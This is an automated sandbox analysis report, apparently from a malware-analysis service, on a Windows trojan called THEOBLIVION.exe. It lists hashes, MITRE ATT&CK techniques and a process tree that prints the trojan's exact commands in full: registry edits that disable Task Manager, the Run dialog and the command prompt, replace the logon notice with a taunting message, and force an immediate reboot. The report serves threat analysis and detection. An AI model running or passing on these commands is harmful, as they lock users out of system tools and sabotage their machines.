c492c1ed09bf6a85b5c9d16cf672ee6598974a89aaa54e731c83708d79bdca87

Resubmissions

23/12/2023, 12:47

231223-p1h3facef2 4

23/12/2023, 12:47

231223-pz6r4sced3 3

Analysis

max time kernel
0s
max time network
2s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
23/12/2023, 12:47

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

THEOBLIVION.exe
Size

58KB
MD5

26ac3ad16bab5dbee05d83e5f2d83cfc
SHA1

02aeb82ca90175be1c79cb73cb7b73da5459be83
SHA256

c492c1ed09bf6a85b5c9d16cf672ee6598974a89aaa54e731c83708d79bdca87
SHA512

b3b780db2d071944a262eba327ce9c1406b0b1bbdf142da710e2071aeac4564e809446197ff3d2730e98f4b113329326c1f6bed7d93492a17ab57fa02b49026d
SSDEEP

768:tdiH7ekigOqvGMveAIAy51sL4rI1xd/4qOncBxQjVdRH:GbekCKvZu8icBxQjVL

Score

4^/10

Malware Config

Signatures

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\inf\tHeOblIVIOn.bmp	THEOBLIVION.exe

Modifies registry key 1 TTPs 4 IoCs

Modify Registry

T1112

pid	Process
2644	reg.exe
2568	reg.exe
2552	reg.exe
2940	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2652	PING.EXE

C:\Users\Admin\AppData\Local\Temp\THEOBLIVION.exe
"C:\Users\Admin\AppData\Local\Temp\THEOBLIVION.exe"
1⤵
- Drops file in Windows directory
PID:836
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v LegalNoticeText /t REG_SZ /d "OBLIVION TROJAN -- YOUR COMPUTER IS NO MORE!!!! :-)" > nul 2>&1
  2⤵
  PID:1216
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v LegalNoticeText /t REG_SZ /d "OBLIVION TROJAN -- YOUR COMPUTER IS NO MORE!!!! :-)"
    3⤵
    PID:2808
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKCU\Control Panel\Desktop" /f /v WallpaperStyle /t REG_SZ /d 2 > nul 2>&1
  2⤵
  PID:2348
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /f /v WallpaperStyle /t REG_SZ /d 2
    3⤵
    PID:1852
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 1 > nul 2>&1
  2⤵
  PID:2964
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:2940
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableLUA /t REG_DWORD /d 0 > nul 2>&1
  2⤵
  PID:2772
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableLUA /t REG_DWORD /d 0
    3⤵
    - Modifies registry key
    PID:2568
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ping 127.0.0.1 -w 200 -n 2 > nul 2>&1
  2⤵
  PID:2608
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /f /v NoRun /t REG_DWORD /d 1 > nul 2>&1
  2⤵
  PID:2804
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Policies\Microsoft\Windows\System /f /v DisableCMD /t REG_DWORD /d 2 > nul 2>&1
  2⤵
  PID:2540
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKCU\Control Panel\Desktop" /f /v Wallpaper /t REG_SZ /d "C:\Windows\inf\tHeOblIVIOn.bmp" > nul 2>&1
  2⤵
  PID:2388
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c shutdown -r -t 0 > nul 2>&1
  2⤵
  PID:2656
- - C:\Windows\SysWOW64\shutdown.exe
    shutdown -r -t 0
    3⤵
    PID:2828
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v LegalNoticeCaption /t REG_SZ /d "O B L I V I O N V1" > nul 2>&1
  2⤵
  PID:1808

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -w 200 -n 2
1⤵
- Runs ping.exe
PID:2652

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /f /v NoRun /t REG_DWORD /d 1
1⤵
- Modifies registry key
PID:2552

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Policies\Microsoft\Windows\System /f /v DisableCMD /t REG_DWORD /d 2
1⤵
- Modifies registry key
PID:2644

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Control Panel\Desktop" /f /v Wallpaper /t REG_SZ /d "C:\Windows\inf\tHeOblIVIOn.bmp"
1⤵
PID:2400

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:2304

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v LegalNoticeCaption /t REG_SZ /d "O B L I V I O N V1"
1⤵
PID:2320

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/836-1-0x00000000008B0000-0x00000000008C2000-memory.dmp

Filesize
72KB

Download
memory/2304-2-0x0000000002D90000-0x0000000002D91000-memory.dmp

Filesize
4KB

Download